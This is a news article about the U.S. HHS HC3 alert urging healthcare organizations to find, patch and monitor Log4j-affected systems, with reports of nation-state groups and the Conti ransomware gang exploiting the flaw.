HC3 once again asks healthcare, public health sector organizations to secure from Log4j exploitation

The U.S. Department of Health & Human Services’ Health Sector Cybersecurity Coordination Center (HC3) once again called upon healthcare and public health (HPH) sector organizations to take immediate actions to protect against Log4j exploitation. The recommendation comes in the wake of the escalating threat brought about by these vulnerabilities, which are being widely exploited by hackers.

HC3 has asked HPH sector organizations to discover all internet-facing assets that allow data inputs and use the Log4j Java library anywhere in the stack, in addition to identifying all assets that use the Log4j library. Organizations must also update or isolate affected assets, assume compromise, identify common post-exploit sources and activity, and hunt for signs of malicious activity. Further, the HPH sector organizations were also asked to monitor for odd traffic patterns, such as JNDI LDAP/RMI outbound traffic, or DMZ systems initiating outbound connections.

The agency also drew the attention of the healthcare sector to the Cybersecurity and Infrastructure Security Agency’s (CISA’s) Rapid Action Force (RAF) made available an open-sourced log4j-scanner, derived from scanners created by other members of the open-source community. 

“This tool is intended to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities. The GitHub below repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046),” the HC3 wrote in its latest alert.

The information and code in this repository are provided ‘as is’ and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community, it added. 

HC3 also said that Microsoft has observed the CVE-2021-44228 vulnerability being actively exploited by multiple nation-state-backed groups originating from China, Iran, North Korea, and Turkey. Furthermore, cybercriminal actors including initial access brokers (IABs) have begun using the Log4j exploitation to gain initial access to target networks.

In its initial reaction to the Log4j exploitation, the HC3 has identified that Log4j is widely deployed throughout the health sector, as in other industries. “It’s a common application, utilized by many enterprise and cloud applications, including several large and well-known vendors. Therefore, it’s highly likely that the health sector is impacted by this vulnerability, and possibly to a largescale extent.Log4j is known to be a component in many software platforms, some of which are part of cloud services.”

At the time, HC3 recommended treating the vulnerabilities as a top priority. A large and growing number of large vendors have been developing and releasing patches specific to these vulnerabilities. HC3 expects this list to continue to grow.

The HC3 recommendation came at the same time as recent data from the CyberPeace Institute revealed that at least 39 ransomware operators have attacked one or more healthcare organizations across 27 countries over the past 18 months. These attacks have occurred in the backdrop of the raging COVID-19 pandemic, despite many of these groups’ claims that they would not target healthcare organizations.

“This is a serious issue and it cannot be downplayed how quickly organizations need to respond,” Erik Decker, CISO of Utah-based healthcare delivery system Intermountain Healthcare and co-chair of an HHS cybersecurity advisory task force, said in a statement. “It allows for a bad actor to execute remote code against servers, or downstream servers, that are vulnerable over the internet. Bad actors use vulnerabilities like these as their first step in large-scale compromises. The intention could be data theft, ransomware, or intellectual property theft,” he added.

“It was reported that the Conti ransomware gang is now exploiting this vulnerability to release ransomware on internal systems,” Decker added.

A week after the Log4j2 vulnerability became public, threat prevention and loss avoidance firm AdvIntel discovered “the most concerning trend – the exploitation of the new CVE by one of the most prolific organized ransomware groups – Conti.”

AdvIntel said that Conti plays a special role in the prevailing threat landscape, primarily due to its scale. Divided into several teams, the Russian-speaking Conti made over US$150 million in the last six months, according to AdvIntel research into the ransomware logs, and they continue to expand. 

“It is this expansion that has set Conti on a long quest of searching for new attack surfaces and methods,” Vitali Kremez and Yelisey Boguslavskiy, AdvIntel researchers wrote in a recent post. “Since August, they have employed many new means: hidden RMM backdoors, new backup removal solutions, and, most recently, even an entire operation to revive Emotet.”

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.